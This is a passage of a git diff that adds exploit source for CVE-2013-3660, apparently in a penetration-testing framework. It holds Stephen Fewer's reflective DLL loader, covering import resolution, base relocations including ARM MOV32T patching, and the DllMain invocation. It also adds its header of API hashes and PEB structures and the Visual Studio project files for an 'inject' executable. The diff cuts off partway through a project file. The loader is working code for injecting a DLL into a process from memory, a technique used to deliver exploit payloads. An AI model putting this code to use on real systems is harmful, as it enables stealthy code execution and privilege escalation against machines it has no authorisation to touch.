+				uiAddressArray = ( uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
+
+				// use the import ordinal (- export ordinal base) as an index into the array of addresses
+				uiAddressArray += ( ( IMAGE_ORDINAL( ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal ) - ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->Base ) * sizeof(DWORD) );
+
+				// patch in the address for this imported function
+				DEREF(uiValueA) = ( uiLibraryAddress + DEREF_32(uiAddressArray) );
+			}
+			else
+			{
+				// get the VA of this functions import by name struct
+				uiValueB = ( uiBaseAddress + DEREF(uiValueA) );
+
+				// use GetProcAddress and patch in the address for this imported function
+				DEREF(uiValueA) = (ULONG_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name );
+			}
+			// get the next imported function
+			uiValueA += sizeof( ULONG_PTR );
+			if( uiValueD )
+				uiValueD += sizeof( ULONG_PTR );
+		}
+
+		// get the next import
+		uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR );
+	}
+
+	// STEP 5: process all of our images relocations...
+
+	// calculate the base address delta and perform relocations (even if we load at desired image base)
+	uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase;
+
+	// uiValueB = the address of the relocation directory
+	uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ];
+
+	// check if their are any relocations present
+	if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
+	{
+		// uiValueC is now the first entry (IMAGE_BASE_RELOCATION)
+		uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
+
+		// and we itterate through all entries...
+		while( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock )
+		{
+			// uiValueA = the VA for this relocation block
+			uiValueA = ( uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress );
+
+			// uiValueB = number of entries in this relocation block
+			uiValueB = ( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION) ) / sizeof( IMAGE_RELOC );
+
+			// uiValueD is now the first entry in the current relocation block
+			uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION);
+
+			// we itterate through all the entries in the current block...
+			while( uiValueB-- )
+			{
+				// perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required.
+				// we dont use a switch statement to avoid the compiler building a jump table
+				// which would not be very position independent!
+				if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64 )
+					*(ULONG_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress;
+				else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW )
+					*(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress;
+#ifdef WIN_ARM
+				// Note: On ARM, the compiler optimization /O2 seems to introduce an off by one issue, possibly a code gen bug. Using /O1 instead avoids this problem.
+				else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_ARM_MOV32T )
+				{	
+					register DWORD dwInstruction;
+					register DWORD dwAddress;
+					register WORD wImm;
+					// get the MOV.T instructions DWORD value (We add 4 to the offset to go past the first MOV.W which handles the low word)
+					dwInstruction = *(DWORD *)( uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD) );
+					// flip the words to get the instruction as expected
+					dwInstruction = MAKELONG( HIWORD(dwInstruction), LOWORD(dwInstruction) );
+					// sanity chack we are processing a MOV instruction...
+					if( (dwInstruction & ARM_MOV_MASK) == ARM_MOVT )
+					{
+						// pull out the encoded 16bit value (the high portion of the address-to-relocate)
+						wImm  = (WORD)( dwInstruction & 0x000000FF);
+						wImm |= (WORD)((dwInstruction & 0x00007000) >> 4);
+						wImm |= (WORD)((dwInstruction & 0x04000000) >> 15);
+						wImm |= (WORD)((dwInstruction & 0x000F0000) >> 4);
+						// apply the relocation to the target address
+						dwAddress = ( (WORD)HIWORD(uiLibraryAddress) + wImm ) & 0xFFFF;
+						// now create a new instruction with the same opcode and register param.
+						dwInstruction  = (DWORD)( dwInstruction & ARM_MOV_MASK2 );
+						// patch in the relocated address...
+						dwInstruction |= (DWORD)(dwAddress & 0x00FF);
+						dwInstruction |= (DWORD)(dwAddress & 0x0700) << 4;
+						dwInstruction |= (DWORD)(dwAddress & 0x0800) << 15;
+						dwInstruction |= (DWORD)(dwAddress & 0xF000) << 4;
+						// now flip the instructions words and patch back into the code...
+						*(DWORD *)( uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD) ) = MAKELONG( HIWORD(dwInstruction), LOWORD(dwInstruction) );
+					}
+				}
+#endif
+				else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH )
+					*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress);
+				else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW )
+					*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress);
+
+				// get the next entry in the current relocation block
+				uiValueD += sizeof( IMAGE_RELOC );
+			}
+
+			// get the next entry in the relocation directory
+			uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock;
+		}
+	}
+
+	// STEP 6: call our images entry point
+
+	// uiValueA = the VA of our newly loaded DLL/EXE's entry point
+	uiValueA = ( uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint );
+
+	// We must flush the instruction cache to avoid stale code being used which was updated by our relocation processing.
+	pNtFlushInstructionCache( (HANDLE)-1, NULL, 0 );
+
+	// call our respective entry point, fudging our hInstance value
+#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
+	// if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter)
+	((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter );
+#else
+	// if we are injecting an DLL via a stub we call DllMain with no parameter
+	((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL );
+#endif
+
+	// STEP 8: return our new entry point address so whatever called us can call DllMain() if needed.
+	return uiValueA;
+}
+//===============================================================================================//
+#ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
+
+BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
+{
+    BOOL bReturnValue = TRUE;
+	switch( dwReason ) 
+    { 
+		case DLL_QUERY_HMODULE:
+			if( lpReserved != NULL )
+				*(HMODULE *)lpReserved = hAppInstance;
+			break;
+		case DLL_PROCESS_ATTACH:
+			hAppInstance = hinstDLL;
+			break;
+		case DLL_PROCESS_DETACH:
+		case DLL_THREAD_ATTACH:
+		case DLL_THREAD_DETACH:
+            break;
+    }
+	return bReturnValue;
+}
+
+#endif
+//===============================================================================================//
diff --git a/external/source/exploits/cve-2013-3660/dll/src/ReflectiveLoader.h b/external/source/exploits/cve-2013-3660/dll/src/ReflectiveLoader.h
new file mode 100755
index 0000000000..b8eb22b0b1
--- /dev/null
+++ b/external/source/exploits/cve-2013-3660/dll/src/ReflectiveLoader.h
@@ -0,0 +1,202 @@
+//===============================================================================================//
+// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
+// All rights reserved.
+// 
+// Redistribution and use in source and binary forms, with or without modification, are permitted 
+// provided that the following conditions are met:
+// 
+//     * Redistributions of source code must retain the above copyright notice, this list of 
+// conditions and the following disclaimer.
+// 
+//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
+// conditions and the following disclaimer in the documentation and/or other materials provided 
+// with the distribution.
+// 
+//     * Neither the name of Harmony Security nor the names of its contributors may be used to
+// endorse or promote products derived from this software without specific prior written permission.
+// 
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
+// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
+// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
+// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
+// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
+// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
+// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
+// POSSIBILITY OF SUCH DAMAGE.
+//===============================================================================================//
+#ifndef _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H
+#define _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H
+//===============================================================================================//
+#define WIN32_LEAN_AND_MEAN
+#include <windows.h>
+#include <Winsock2.h>
+#include <intrin.h>
+#include "ReflectiveDLLInjection.h"
+
+typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR );
+typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR );
+typedef LPVOID  (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD );
+typedef DWORD  (NTAPI * NTFLUSHINSTRUCTIONCACHE)( HANDLE, PVOID, ULONG );
+
+#define KERNEL32DLL_HASH				0x6A4ABC5B
+#define NTDLLDLL_HASH					0x3CFA685D
+
+#define LOADLIBRARYA_HASH				0xEC0E4E8E
+#define GETPROCADDRESS_HASH				0x7C0DFCAA
+#define VIRTUALALLOC_HASH				0x91AFCA54
+#define NTFLUSHINSTRUCTIONCACHE_HASH	0x534C0AB8
+
+#define IMAGE_REL_BASED_ARM_MOV32A		5
+#define IMAGE_REL_BASED_ARM_MOV32T		7
+
+#define ARM_MOV_MASK					(DWORD)(0xFBF08000)
+#define ARM_MOV_MASK2					(DWORD)(0xFBF08F00)
+#define ARM_MOVW						0xF2400000
+#define ARM_MOVT						0xF2C00000
+
+#define HASH_KEY						13
+//===============================================================================================//
+#pragma intrinsic( _rotr )
+
+__forceinline DWORD ror( DWORD d )
+{
+	return _rotr( d, HASH_KEY );
+}
+
+__forceinline DWORD hash( char * c )
+{
+    register DWORD h = 0;
+	do
+	{
+		h = ror( h );
+        h += *c;
+	} while( *++c );
+
+    return h;
+}
+//===============================================================================================//
+typedef struct _UNICODE_STR
+{
+  USHORT Length;
+  USHORT MaximumLength;
+  PWSTR pBuffer;
+} UNICODE_STR, *PUNICODE_STR;
+
+// WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY
+//__declspec( align(8) ) 
+typedef struct _LDR_DATA_TABLE_ENTRY
+{
+	//LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry.
+	LIST_ENTRY InMemoryOrderModuleList;
+	LIST_ENTRY InInitializationOrderModuleList;
+	PVOID DllBase;
+	PVOID EntryPoint;
+	ULONG SizeOfImage;
+	UNICODE_STR FullDllName;
+	UNICODE_STR BaseDllName;
+	ULONG Flags;
+	SHORT LoadCount;
+	SHORT TlsIndex;
+	LIST_ENTRY HashTableEntry;
+	ULONG TimeDateStamp;
+} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
+
+// WinDbg> dt -v ntdll!_PEB_LDR_DATA
+typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes
+{
+   DWORD dwLength;
+   DWORD dwInitialized;
+   LPVOID lpSsHandle;
+   LIST_ENTRY InLoadOrderModuleList;
+   LIST_ENTRY InMemoryOrderModuleList;
+   LIST_ENTRY InInitializationOrderModuleList;
+   LPVOID lpEntryInProgress;
+} PEB_LDR_DATA, * PPEB_LDR_DATA;
+
+// WinDbg> dt -v ntdll!_PEB_FREE_BLOCK
+typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes
+{
+   struct _PEB_FREE_BLOCK * pNext;
+   DWORD dwSize;
+} PEB_FREE_BLOCK, * PPEB_FREE_BLOCK;
+
+// struct _PEB is defined in Winternl.h but it is incomplete
+// WinDbg> dt -v ntdll!_PEB
+typedef struct __PEB // 65 elements, 0x210 bytes
+{
+   BYTE bInheritedAddressSpace;
+   BYTE bReadImageFileExecOptions;
+   BYTE bBeingDebugged;
+   BYTE bSpareBool;
+   LPVOID lpMutant;
+   LPVOID lpImageBaseAddress;
+   PPEB_LDR_DATA pLdr;
+   LPVOID lpProcessParameters;
+   LPVOID lpSubSystemData;
+   LPVOID lpProcessHeap;
+   PRTL_CRITICAL_SECTION pFastPebLock;
+   LPVOID lpFastPebLockRoutine;
+   LPVOID lpFastPebUnlockRoutine;
+   DWORD dwEnvironmentUpdateCount;
+   LPVOID lpKernelCallbackTable;
+   DWORD dwSystemReserved;
+   DWORD dwAtlThunkSListPtr32;
+   PPEB_FREE_BLOCK pFreeList;
+   DWORD dwTlsExpansionCounter;
+   LPVOID lpTlsBitmap;
+   DWORD dwTlsBitmapBits[2];
+   LPVOID lpReadOnlySharedMemoryBase;
+   LPVOID lpReadOnlySharedMemoryHeap;
+   LPVOID lpReadOnlyStaticServerData;
+   LPVOID lpAnsiCodePageData;
+   LPVOID lpOemCodePageData;
+   LPVOID lpUnicodeCaseTableData;
+   DWORD dwNumberOfProcessors;
+   DWORD dwNtGlobalFlag;
+   LARGE_INTEGER liCriticalSectionTimeout;
+   DWORD dwHeapSegmentReserve;
+   DWORD dwHeapSegmentCommit;
+   DWORD dwHeapDeCommitTotalFreeThreshold;
+   DWORD dwHeapDeCommitFreeBlockThreshold;
+   DWORD dwNumberOfHeaps;
+   DWORD dwMaximumNumberOfHeaps;
+   LPVOID lpProcessHeaps;
+   LPVOID lpGdiSharedHandleTable;
+   LPVOID lpProcessStarterHelper;
+   DWORD dwGdiDCAttributeList;
+   LPVOID lpLoaderLock;
+   DWORD dwOSMajorVersion;
+   DWORD dwOSMinorVersion;
+   WORD wOSBuildNumber;
+   WORD wOSCSDVersion;
+   DWORD dwOSPlatformId;
+   DWORD dwImageSubsystem;
+   DWORD dwImageSubsystemMajorVersion;
+   DWORD dwImageSubsystemMinorVersion;
+   DWORD dwImageProcessAffinityMask;
+   DWORD dwGdiHandleBuffer[34];
+   LPVOID lpPostProcessInitRoutine;
+   LPVOID lpTlsExpansionBitmap;
+   DWORD dwTlsExpansionBitmapBits[32];
+   DWORD dwSessionId;
+   ULARGE_INTEGER liAppCompatFlags;
+   ULARGE_INTEGER liAppCompatFlagsUser;
+   LPVOID lppShimData;
+   LPVOID lpAppCompatInfo;
+   UNICODE_STR usCSDVersion;
+   LPVOID lpActivationContextData;
+   LPVOID lpProcessAssemblyStorageMap;
+   LPVOID lpSystemDefaultActivationContextData;
+   LPVOID lpSystemAssemblyStorageMap;
+   DWORD dwMinimumStackCommit;
+} _PEB, * _PPEB;
+
+typedef struct
+{
+	WORD	offset:12;
+	WORD	type:4;
+} IMAGE_RELOC, *PIMAGE_RELOC;
+//===============================================================================================//
+#endif
+//===============================================================================================//
diff --git a/external/source/exploits/cve-2013-3660/inject/inject.sln b/external/source/exploits/cve-2013-3660/inject/inject.sln
new file mode 100755
index 0000000000..e6c711e846
--- /dev/null
+++ b/external/source/exploits/cve-2013-3660/inject/inject.sln
@@ -0,0 +1,20 @@
+
+Microsoft Visual Studio Solution File, Format Version 10.00
+# Visual C++ Express 2008
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "inject", "inject.vcproj", "{EEF3FD41-05D8-4A07-8434-EF5D34D76335}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Win32 = Debug|Win32
+		Release|Win32 = Release|Win32
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|Win32.ActiveCfg = Release|Win32
+		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|Win32.Build.0 = Release|Win32
+		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|Win32.ActiveCfg = Release|Win32
+		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|Win32.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal
diff --git a/external/source/exploits/cve-2013-3660/inject/inject.vcproj b/external/source/exploits/cve-2013-3660/inject/inject.vcproj
new file mode 100755
index 0000000000..87312eb71c
--- /dev/null
+++ b/external/source/exploits/cve-2013-3660/inject/inject.vcproj
@@ -0,0 +1,360 @@
+<?xml version="1.0" encoding="Windows-1252"?>
+<VisualStudioProject
+	ProjectType="Visual C++"
+	Version="9.00"
+	Name="inject"
+	ProjectGUID="{EEF3FD41-05D8-4A07-8434-EF5D34D76335}"
+	RootNamespace="inject"
+	Keyword="Win32Proj"
+	TargetFrameworkVersion="196613"
+	>
+	<Platforms>
+		<Platform
+			Name="Win32"
+		/>
+		<Platform
+			Name="x64"
+		/>
+	</Platforms>
+	<ToolFiles>
+	</ToolFiles>
+	<Configurations>
+		<Configuration
+			Name="Debug|Win32"
+			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
+			IntermediateDirectory="$(ConfigurationName)"
+			ConfigurationType="1"
+			CharacterSet="1"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="0"
+				PreprocessorDefinitions="WIN32;_DEBUG;_CONSOLE"
+				MinimalRebuild="true"
+				BasicRuntimeChecks="3"
+				RuntimeLibrary="3"
+				UsePrecompiledHeader="0"
+				WarningLevel="3"
+				DebugInformationFormat="4"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				LinkIncremental="2"
+				GenerateDebugInformation="true"
+				SubSystem="1"
+				TargetMachine="1"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
+		</Configuration>
+		<Configuration
+			Name="Debug|x64"
+			OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
+			IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
+			ConfigurationType="1"
+			CharacterSet="1"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+				TargetEnvironment="3"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="0"
+				PreprocessorDefinitions="WIN32;_DEBUG;_CONSOLE"
+				MinimalRebuild="true"
+				BasicRuntimeChecks="3"
+				RuntimeLibrary="3"
+				UsePrecompiledHeader="0"
+				WarningLevel="3"
+				DebugInformationFormat="3"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				LinkIncremental="2"
+				GenerateDebugInformation="true"
+				SubSystem="1"
+				TargetMachine="17"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
+		</Configuration>
+		<Configuration
+			Name="Release|Win32"
+			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
+			IntermediateDirectory="$(ConfigurationName)"
+			ConfigurationType="1"
+			CharacterSet="2"
+			WholeProgramOptimization="1"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="2"
+				EnableIntrinsicFunctions="true"
+				PreprocessorDefinitions="WIN32;NDEBUG;_CONSOLE"
+				RuntimeLibrary="0"
+				EnableFunctionLevelLinking="true"
+				UsePrecompiledHeader="0"
+				WarningLevel="3"
+				DebugInformationFormat="3"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				LinkIncremental="1"
+				GenerateDebugInformation="true"
+				SubSystem="1"
+				OptimizeReferences="2"
+				EnableCOMDATFolding="2"
+				TargetMachine="1"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+				CommandLine="copy ..\Release\inject.exe ..\bin\"
+			/>
+		</Configuration>
+		<Configuration
+			Name="Release|x64"
+			OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
+			IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
+			ConfigurationType="1"
+			CharacterSet="2"
+			WholeProgramOptimization="1"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+				TargetEnvironment="3"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="2"
+				EnableIntrinsicFunctions="true"
+				PreprocessorDefinitions="WIN64;NDEBUG;_CONSOLE;_WIN64"
+				RuntimeLibrary="0"
+				EnableFunctionLevelLinking="true"
+				UsePrecompiledHeader="0"
+				WarningLevel="3"
+				DebugInformationFormat="3"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				OutputFile="$(OutDir)\inject.x64.exe"
+				LinkIncremental="1"
+				GenerateDebugInformation="true"
+				SubSystem="1"
+				OptimizeReferences="2"
+				EnableCOMDATFolding="2"
+				TargetMachine="17"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+				CommandLine="copy ..\x64\Release\inject.x64.exe ..\bin\"
+			/>
+		</Configuration>
+	</Configurations>
+	<References>
+	</References>
+	<Files>
+		<Filter
+			Name="Source Files"
+			Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
+			UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
+			>
+			<File
+				RelativePath=".\src\GetProcAddressR.c"
+				>
+			</File>
+			<File
+				RelativePath=".\src\Inject.c"
+				>
+			</File>
+			<File
+				RelativePath=".\src\LoadLibraryR.c"
+				>
+			</File>
+		</Filter>
+		<Filter
+			Name="Header Files"
+			Filter="h;hpp;hxx;hm;inl;inc;xsd"
+			UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"
+			>
+			<File
+				RelativePath=".\src\GetProcAddressR.h"
+				>
+			</File>
+			<File
+				RelativePath=".\src\LoadLibraryR.h"
+				>
+			</File>
+			<File
+				RelativePath=".\src\ReflectiveDLLInjection.h"
+				>
+			</File>
+		</Filter>
+	</Files>
+	<Globals>
+	</Globals>
+</VisualStudioProject>
diff --git a/external/source/exploits/cve-2013-3660/inject/inject.vcxproj b/external/source/exploits/cve-2013-3660/inject/inject.vcxproj
new file mode 100755
index 0000000000..683ccc4aa7
--- /dev/null
+++ b/external/source/exploits/cve-2013-3660/inject/inject.vcxproj
@@ -0,0 +1,258 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|ARM">
+      <Configuration>Debug</Configuration>
+      <Platform>ARM</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|ARM">
+      <Configuration>Release</Configuration>
+      <Platform>ARM</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <ProjectGuid>{EEF3FD41-05D8-4A07-8434-EF5D34D76335}</ProjectGuid>
+    <RootNamespace>inject</RootNamespace>
+    <Keyword>Win32Proj</Keyword>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <PlatformToolset>v110</PlatformToolset>
+    <CharacterSet>MultiByte</CharacterSet>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <PlatformToolset>v110</PlatformToolset>
+    <CharacterSet>MultiByte</CharacterSet>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <PlatformToolset>v110</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <PlatformToolset>v110</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <PlatformToolset>v110</PlatformToolset>
+    <CharacterSet>MultiByte</CharacterSet>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <PlatformToolset>v110</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'" Label="PropertySheets">
